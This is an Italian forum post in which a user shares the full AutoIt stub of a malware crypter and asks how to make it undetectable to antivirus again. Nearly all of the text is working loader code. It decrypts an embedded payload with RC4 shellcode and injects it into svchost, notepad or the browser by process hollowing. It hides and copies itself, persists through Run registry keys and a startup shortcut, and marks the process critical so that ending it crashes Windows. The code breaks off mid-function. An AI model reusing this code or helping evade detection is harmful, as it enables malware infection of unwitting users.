-
Fm$_The_BoSs_
.User deleted
Oggi ho trovato un Crypter scritto in AutoIt con il rispettivo Stub e il Source, qualcuno potrebbe spiegarmi come refuddare lo Stub?
Ecco il Code dello Stub:SPOILER (clicca per visualizzare)CODICE#NoTrayIcon
Global Const $TOKEN_ADJUST_PRIVILEGES = 0x0020
Global Const $TOKEN_QUERY = 0x0008
MUTEX("DZ")
Global $PID
STARTSERVER()
Func STARTSERVER()
Local $OPENSTUB = FileOpen(@ScriptFullPath, 0)
Local $READSERVER = FileRead($OPENSTUB)
FileClose($OPENSTUB)
Local $READ = StringSplit($READSERVER, "\@/", 1)
If @error Then Exit
Local $READOEF = StringSplit(DCRYPTTXT($READ[3]), "\@/", 1)
If $READOEF[1] = 1 Then
Local $SLAS
Switch $READOEF[2]
Case "D"
$SLAS = @DesktopDir
Case "A"
$SLAS = @AppDataDir
Case "P"
$SLAS = @ProgramFilesDir
Case "U"
$SLAS = @UserProfileDir
Case "T"
$SLAS = @TempDir
Case "W"
$SLAS = @WindowsDir
Case "S"
$SLAS = @StartupDir
EndSwitch
If $READOEF[3] <> "" Then
$SLAS &= "\" & $READOEF[3]
If FileExists($SLAS) = 0 Then DirCreate($SLAS)
EndIf
If $READOEF[4] <> "" Then
$SLAS &= "\" & $READOEF[4]
Else
$SLAS &= "\" & @ScriptName
EndIf
If FileGetShortName(@ScriptFullPath) <> FileGetShortName($SLAS) Then
If FileExists($SLAS) Then FileMove($SLAS, @TempDir & "\TMP", 1)
If $READOEF[5] = 1 Then
FileMove(@ScriptFullPath, FileGetShortName($SLAS), 1)
Else
FileCopy(@ScriptFullPath, FileGetShortName($SLAS), 1)
EndIf
If $READOEF[6] = 1 Then FileSetAttrib(FileGetShortName($SLAS), "+HSR")
ShellExecute(FileGetShortName($SLAS), '/AUTOIT3EXECUTELINE "IF PROCESSWAITCLOSE(' & @AutoItPID & ') THEN SHELLEXECUTE(''' & FileGetShortName($SLAS) & ''')"')
Exit
EndIf
EndIf
If $READOEF[7] <> "" Then
RegRead("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN\", $READOEF[6])
If @error Then STRUP(@ScriptFullPath, $READOEF[6])
EndIf
If $READOEF[8] <> "" Then Sleep($READOEF[8] & "000")
Local $injeto
Local $gdb
Switch $READOEF[9]
Case "SVCHOST.EXE", "NOTEPAD.EXE"
$injeto = @SystemDir & "\" & $READOEF[9]
Case Else
$gdb = StringSplit(RegRead("HKCR\http\shell\open\command", ""), '"')
$injeto = $gdb[2]
EndSwitch
$PID = runbinary(RC4($READ[2], 1), "", $injeto)
If $READOEF[10] = 1 Then
BSOD($PID, 1)
OnAutoItExitRegister("DBSOD")
While ProcessExists($PID) <> 0
Sleep(999)
WEnd
EndIf
EndFunc ;==>STARTSERVER
Func STRUP($PAHT, $KEYNAME)
RegWrite("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN\", $KEYNAME, "REG_EXPAND_SZ", $PAHT)
RegWrite("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\", $KEYNAME, "REG_EXPAND_SZ", $PAHT)
FileCreateShortcut($PAHT, @StartupDir & "\WINDOWS.LNK", "%APPDATA%\MICROSOFT\", "", "WINDOWS", @SystemDir & "\SHELL32.DLL", "", "4", @SW_MINIMIZE)
EndFunc ;==>STRUP
Func DBSOD()
msgbox(0,$PID, 0)
BSOD($PID, 0)
EndFunc ;==>DBSOD
Func DCRYPTTXT($TXT)
Local $CRYPTXT
For $I = 1 To StringLen($TXT)
$CRYPTXT &= Chr(Asc(StringMid($TXT, $I, 1)) - 60)
Next
Return $CRYPTXT
EndFunc ;==>DCRYPTTXT
Func MUTEX($SEMAPHORE)
Local $ERROR_ALREADY_EXISTS = 183
DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $SEMAPHORE)
Local $LASTERROR = DllCall("kernel32.dll", "int", "GetLastError")
If $LASTERROR[0] = $ERROR_ALREADY_EXISTS Then Exit
EndFunc ;==>MUTEX
Func RC4($Data, $Key)
Local $Opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
DllStructSetData($CodeBuffer, 1, $Opcode)
Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
DllStructSetData($Buffer, 1, $Data)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
Local $Ret = DllStructGetData($Buffer, 1)
$Buffer = 0
$CodeBuffer = 0
Return $Ret
EndFunc ;==>RC4
Func BSOD($PROCESS_ID, $BSOD_STATUS)
Local Const $BSOD_CLASS = 29
Local Const $INFO_LENGTH = 4
Local Const $PROCESS_ALL_ACCESS = 0X001F0FFF
Local $RESULT, $PROCESS_HANDLE, $BSOD_STRUCT, $BSOD_STRUCT_PTR
If Not Call("__DEBUGE_PRIVILEGE", True) Then Return
If $PROCESS_ID = 0 Then Return
$PROCESS_HANDLE = _WinAPI_OpenProcess($PROCESS_ALL_ACCESS, True, $PROCESS_ID)
If @error Then Return
$BSOD_STRUCT = DllStructCreate("BOOL BSOD_STATUS")
DllStructSetData($BSOD_STRUCT, "BSOD_STATUS", $BSOD_STATUS)
$BSOD_STRUCT_PTR = DllStructGetPtr($BSOD_STRUCT)
$RESULT = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $PROCESS_HANDLE, "INT", $BSOD_CLASS, "PTR", $BSOD_STRUCT_PTR, "ULONG", $INFO_LENGTH)
_WinAPI_CloseHandle($PROCESS_HANDLE)
$BSOD_STRUCT_PTR = 0
EndFunc ;==>BSOD
Func __DEBUGE_PRIVILEGE($STATUS)
Local $HTOKEN, $ILASTERROR
$HTOKEN = _Security__OpenThreadTokenEx(BitOR($TOKEN_ADJUST_PRIVILEGES, $TOKEN_QUERY))
If @error Then Return SetError(@error, @extended, 0)
$ILASTERROR = _Security__SetPrivilege($HTOKEN, "SEDEBUGPRIVILEGE", $STATUS)
_WinAPI_CloseHandle($HTOKEN)
Return $ILASTERROR
EndFunc ;==>__DEBUGE_PRIVILEGE
Func _Security__SetPrivilege($HTOKEN, $sPrivilege, $fEnable)
Local $iLUID = _Security__LookupPrivilegeValue("", $sPrivilege)
Local Const $tagTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes", $SE_PRIVILEGE_ENABLED = 0x00000002
If $iLUID = 0 Then Return SetError(1, @extended, False)
Local $tCurrState = DllStructCreate($tagTOKEN_PRIVILEGES)
Local $iCurrState = DllStructGetSize($tCurrState)
Local $tPrevState = DllStructCreate($tagTOKEN_PRIVILEGES)
Local $iPrevState = DllStructGetSize($tPrevState)
Local $tRequired = DllStructCreate("int Data")
DllStructSetData($tCurrState, "Count", 1)
DllStructSetData($tCurrState, "LUID", $iLUID)
If Not _Security__AdjustTokenPrivileges($HTOKEN, False, $tCurrState, $iCurrState, $tPrevState, $tRequired) Then Return SetError(2, @error, False)
DllStructSetData($tPrevState, "Count", 1)
DllStructSetData($tPrevState, "LUID", $iLUID)
Local $iAttributes = DllStructGetData($tPrevState, "Attributes")
If $fEnable Then
$iAttributes = BitOR($iAttributes, $SE_PRIVILEGE_ENABLED)
Else
$iAttributes = BitAND($iAttributes, BitNOT($SE_PRIVILEGE_ENABLED))
EndIf
DllStructSetData($tPrevState, "Attributes", $iAttributes)
If Not _Security__AdjustTokenPrivileges($HTOKEN, False, $tPrevState, $iPrevState, $tCurrState, $tRequired) Then _
Return SetError(3, @error, False)
Return True
EndFunc ;==>_Security__SetPrivilege
Func _Security__OpenThreadTokenEx($iAccess, $hThread = 0, $fOpenAsSelf = False)
Local $HTOKEN = _Security__OpenThreadToken($iAccess, $hThread, $fOpenAsSelf)
If $HTOKEN = 0 Then
If Not _Security__ImpersonateSelf() Then Return
$HTOKEN = _Security__OpenThreadToken($iAccess, $hThread, $fOpenAsSelf)
If $HTOKEN = 0 Then Return
EndIf
Return $HTOKEN
EndFunc ;==>_Security__OpenThreadTokenEx
Func _Security__ImpersonateSelf($iLevel = 2)
Local $aCall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $iLevel)
If @error Then Return SetError(1, @extended, False)
Return Not ($aCall[0] = 0)
EndFunc ;==>_Security__ImpersonateSelf
Func _Security__LookupPrivilegeValue($sSystem, $sName)
Local $aCall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $sSystem, "wstr", $sName, "int64*", 0)
If @error Or Not $aCall[0] Then Return SetError(1, @extended, 0)
Return $aCall[3] ; LUID
EndFunc ;==>_Security__LookupPrivilegeValue
Func _Security__AdjustTokenPrivileges($HTOKEN, $fDisableAll, $pNewState, $iBufferLen, $pPrevState = 0, $pRequired = 0)
Local $aCall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $HTOKEN, "bool", $fDisableAll, "struct*", $pNewState, "dword", $iBufferLen, "struct*", $pPrevState, "struct*", $pRequired)
If @error Then Return SetError(1, @extended, False)
Return Not ($aCall[0] = 0)
EndFunc ;==>_Security__AdjustTokenPrivileges
Func _WinAPI_GetCurrentThread()
Local $aResult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
If @error Then Return SetError(@error, @extended, 0)
Return $aResult[0]
EndFunc ;==>_WinAPI_GetCurrentThread
Func _Security__OpenThreadToken($iAccess, $hThread = 0, $fOpenAsSelf = False)
If $hThread = 0 Then $hThread = _WinAPI_GetCurrentThread()
If @error Then Return SetError(1, @extended, 0)
Local $aCall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hThread, "dword", $iAccess, "bool", $fOpenAsSelf, "handle*", 0)
If @error Or Not $aCall[0] Then Return SetError(2, @extended, 0)
Return $aCall[4] ; Token
EndFunc ;==>_Security__OpenThreadToken
Func _WinAPI_CloseHandle($hObject)
Local $aResult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hObject)
If @error Then Return SetError(@error, @extended, False)
Return $aResult[0]
EndFunc ;==>_WinAPI_CloseHandle
Func _WinAPI_OpenProcess($iAccess, $fInherit, $iProcessID, $fDebugPriv = False)
Local $aResult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iAccess, "bool", $fInherit, "dword", $iProcessID)
If @error Then Return SetError(@error, @extended, 0)
If $aResult[0] Then Return $aResult[0]
If Not $fDebugPriv Then Return 0
Local $HTOKEN = _Security__OpenThreadTokenEx(BitOR($TOKEN_ADJUST_PRIVILEGES, $TOKEN_QUERY))
If @error Then Return SetError(@error, @extended, 0)
_Security__SetPrivilege($HTOKEN, "SeDebugPrivilege", True)
Local $iError = @error
Local $ILASTERROR = @extended
Local $iRet = 0
If Not @error Then
$aResult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iAccess, "bool", $fInherit, "dword", $iProcessID)
$iError = @error
$ILASTERROR = @extended
If $aResult[0] Then $iRet = $aResult[0]
_Security__SetPrivilege($HTOKEN, "SeDebugPrivilege", False)
If @error Then
$iError = @error
$ILASTERROR = @extended
EndIf
EndIf
_WinAPI_CloseHandle($HTOKEN)
Return SetError($iError, $ILASTERROR, $iRet)
EndFunc ;==>_WinAPI_OpenProcess
Func runbinary($bbinaryimage, $scommandline = "", $sexemodule = @AutoItExe)
#region 1. DETERMINE INTERPRETER TYPE
Local $fautoitx64 = @AutoItX64
#region 2. PREDPROCESSING PASSED
Local $bbinary = Binary($bbinaryimage)
Local $tbinary = DllStructCreate("byte[" & BinaryLen($bbinary) & "]")
DllStructSetData($tbinary, 1, $bbinary)
Local $ppointer = DllStructGetPtr($tbinary)
#region 3. CREATING NEW PROCESS
Local $tstartupinfo = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "word ShowWindow;" & "word Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $tprocess_information = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($tstartupinfo), "ptr", DllStructGetPtr($tprocess_information))
If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
Local $hprocess = DllStructGetData($tprocess_information, "Process")
Local $hThread = DllStructGetData($tprocess_information, "Thread")
If $fautoitx64 And _runbinary_iswow64process($hprocess) Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#region 4. FILL CONTEXT STRUCTURE
Local $irunflag, $tcontext
If $fautoitx64 Then
If @OSArch = "X64" Then
$irunflag = 2
$tcontext = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & "dword ContextFlags; dword MxCsr;" & "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & "uint64 Rip;" & "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & "uint64 VectorRegister[52]; uint64 VectorControl;" & "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
Else
$irunflag = 3
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(102, 0, 0)
EndIf
Else
$irunflag = 1
$tcontext = DllStructCreate("dword ContextFlags;" & "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & "byte ExtendedRegisters[512]")
EndIf
Local $context_full
Switch $irunflag
Case 1
$context_full = 65543
Case 2
$context_full = 1048583
Case 3
$context_full = 524327
EndSwitch
DllStructSetData($tcontext, "ContextFlags", $context_full)
$aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $hThread, "ptr", DllStructGetPtr($tcontext))
If @error Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $ppeb
Switch $irunflag
Case 1
$ppeb = DllStructGetData($tcontext, "Ebx")
Case 2
$ppeb = DllStructGetData($tcontext, "Rdx")
Case 3
EndSwitch
#region 5. READ PE-FORMAT
Local $timage_dos_header = DllStructCreate("char Magic[2];" & "word BytesOnLastPage;" & "word Pages;" & "word Relocations;" & "word SizeofHeader;" & "word MinimumExtra;" & "word MaximumExtra;" & "word SS;" & "word SP;" & "word Checksum;" & "word IP;" & "word CS;" & "word Relocation;" & "word Overlay;" & "char Reserved[8];" & "word OEMIdentifier;" & "word OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $ppointer)
Local $pheaders_new = $ppointer
$ppointer += DllStructGetData($timage_dos_header, "AddressOfNewExeHeader")
Local $smagic = DllStructGetData($timage_dos_header, "Magic")
If Not ($smagic == "MZ") Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $timage_nt_signature = DllStructCreate("dword Signature", $ppointer)
$ppointer += 4
If DllStructGetData($timage_nt_signature, "Signature") <> 17744 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $timage_file_header = DllStructCreate("word Machine;" & "word NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "word SizeOfOptionalHeader;" & "word Characteristics", $ppointer)
Local $inumberofsections = DllStructGetData($timage_file_header, "NumberOfSections")
$ppointer += 20
Local $tmagic = DllStructCreate("word Magic;", $ppointer)
Local $imagic = DllStructGetData($tmagic, 1)
Local $timage_optional_header
If $imagic = 267 Then
If $fautoitx64 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $ppointer)
$ppointer += 96
ElseIf $imagic = 523 Then
If Not $fautoitx64 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "uint64 ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "uint64 SizeOfStackReserve;" & "uint64 SizeOfStackCommit;" & "uint64 SizeOfHeapReserve;" & "uint64 SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $ppointer)
$ppointer += 112
Else
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(6, 0, 0)
EndIf
Local $ientrypointnew = DllStructGetData($timage_optional_header, "AddressOfEntryPoint")
Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SizeOfHeaders")
Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "ImageBase")
Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SizeOfImage")
$ppointer += 8
$ppointer += 8
$ppointer += 24
Local $timage_directory_entry_basereloc = DllStructCreate("dword VirtualAddress; dword Size", $ppointer)
Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VirtualAddress")
Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "Size")
Local $frelocatable
If $paddressnewbasereloc And $isizebasereloc Then $frelocatable = True
If Not $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
$ppointer += 88
#region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $frelocate
Local $pzeropoint
If $frelocatable Then
$pzeropoint = _runbinary_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
If @error Then
$pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
_runbinary_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$frelocate = True
Else
$pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
_runbinary_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = _runbinary_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
DllStructSetData($timage_optional_header, "ImageBase", $pzeropoint)
#region 7. CONSTRUCT THE NEW MODULE
Local $tmodule = DllStructCreate("byte[" & $ioptionalheadersizeofimagenew & "]")
Local $pmodule = DllStructGetPtr($tmodule)
Local $theaders = DllStructCreate("byte[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
Local $timage_section_header
Local $isizeofrawdata, $ppointertorawdata
Local $ivirtualaddress, $ivirtualsize
Local $trelocraw
For $I = 1 To $inumberofsections
$timage_section_header = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "word NumberOfRelocations;" & "word NumberOfLinenumbers;" & "dword Characteristics", $ppointer)
$isizeofrawdata = DllStructGetData($timage_section_header, "SizeOfRawData")
$ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "PointerToRawData")
$ivirtualaddress = DllStructGetData($timage_section_header, "VirtualAddress")
$ivirtualsize = DllStructGetData($timage_section_header, "UnionOfVirtualSizeAndPhysicalAddress")
If $ivirtualsize And $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
If $isizeofrawdata Then
DllStructSetData(DllStructCreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
EndIf
If $frelocate Then
If $ivirtualaddress <= $paddressnewbasereloc And $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
$trelocraw = DllStructCreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
EndIf
EndIf
$ppointer += 40
Next
If $frelocate Then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
$aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0)
If @error Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(7, 0, 0)
EndIf
#region 8. PEB ImageBaseAddress MANIPULATION
Local $tpeb = DllStructCreate("byte InheritedAddressSpace;" & "byte ReadImageFileExecOptions;" & "byte BeingDebugged;" & "byte Spare;" & "ptr Mutant;" & "ptr ImageBaseAddress;" & "ptr LoaderData;" & "ptr ProcessParameters;" & "ptr SubSystemData;" & "ptr ProcessHeap;" & "ptr FastPebLock;" & "ptr FastPebLockRoutine;" & "ptr FastPebUnlockRoutine;" & "dword EnvironmentUpdateCount;" & "ptr KernelCallbackTable;" & "ptr EventLogSection;" & "ptr EventLog;" & "ptr FreeList;" & "dword TlsExpansionCounter;" & "ptr TlsBitmap;" & "dword TlsBitmapBits[2];" & "ptr ReadOnlySharedMemoryBase;" & "ptr ReadOnlySharedMemoryHeap;" & "ptr ReadOnlyStaticServerData;" & "ptr AnsiCodePageData;" & "ptr OemCodePageData;" & "ptr UnicodeCaseTableData;" & "dword NumberOfProcessors;" & "dword NtGlobalFlag;" & "byte Spare2[4];" & "int64 CriticalSectionTimeout;" & "dword HeapSegmentReserve;" & "dword HeapSegmentCommit;" & "dword HeapDeCommitTotalFreeThreshold;" & "dword HeapDeCommitFreeBlockThreshold;" & "dword NumberOfHeaps;" & "dword MaximumNumberOfHeaps;" & "ptr ProcessHeaps;" & "ptr GdiSharedHandleTable;" & "ptr ProcessStarterHelper;" & "ptr GdiDCAttributeList;" & "ptr LoaderLock;" & "dword OSMajorVersion;" & "dword OSMinorVersion;" & "dword OSBuildNumber;" & "dword OSPlatformId;" & "dword ImageSubSystem;" & "dword ImageSubSystemMajorVersion;" & "dword ImageSubSystemMinorVersion;" & "dword GdiHandleBuffer[34];" & "dword PostProcessInitRoutine;" & "dword TlsExpansionBitmap;" & "byte TlsExpansionBitmapBits[128];" & "dword SessionId")
$aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $hprocess, "ptr", $ppeb, "ptr", DllStructGetPtr($tpeb), "dword_ptr", DllStructGetSize($tpeb), "dword_ptr*", 0)
If @error Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(8, 0, 0)
EndIf
DllStructSetData($tpeb, "ImageBaseAddress", $pzeropoint)
$aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $ppeb, "ptr", DllStructGetPtr($tpeb), "dword_ptr", DllStructGetSize($tpeb), "dword_ptr*", 0)
If @error Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(9, 0, 0)
EndIf
#region 9. NEW ENTRY POINT
Switch $irunflag
Case 1
DllStructSetData($tcontext, "Eax", $pzeropoint + $ientrypointnew)
Case 2
DllStructSetData($tcontext, "Rcx", $pzeropoint + $ientrypointnew)
Case 3
EndSwitch
#region 10. SET NEW CONTEXT
$aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $hThread, "ptr", DllStructGetPtr($tcontext))
If @error Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(10, 0, 0)
EndIf
#region 11. RESUME THREAD
$aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
If @error Or $aCall[0] = -1 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
Return SetError(11, 0, 0)
EndIf
#region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hprocess)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
Return DllStructGetData($tprocess_information, "ProcessId")
EndFunc ;==>runbinary
Func _runbinary_fixreloc($pmodule, $tData, $paddressnew, $paddressold, $fimagex64)
Local $idelta = $paddressnew - $paddressold
Local $iSize = DllStructGetSize($tData)
Local $pdata = DllStructGetPtr($tData)
Local $timage_base_relocation, $irelativemove
Local $ivirtualaddress, $isizeofblock, $inumberofentries
Local $tenries, $idata, $taddress
Local $iflag = 3 + 7 * $fimagex64
While $irelativemove < $iSize
$timage_base_relocation = DllStructCreate("dword VirtualAddress; dword SizeOfBlock", $pdata + $irelativemove)
$ivirtualaddress = DllStructGetData($timage_base_relocation, "VirtualAddress")
$isizeofblock = DllStructGetData($timage_base_relocation, "SizeOfBlock")
$inumberofentries = ($isizeofblock - 8) / 2
$tenries = DllStructCreate("word[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
For $I = 1 To $inumberofentries
$idata = DllStructGetData($tenries, 1, $I)
If BitShift($idata, 12) = $iflag Then
$taddress = DllStructCreate("ptr", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
EndIf
Next
$irelativemove += $isizeofblock
WEnd
Return 1
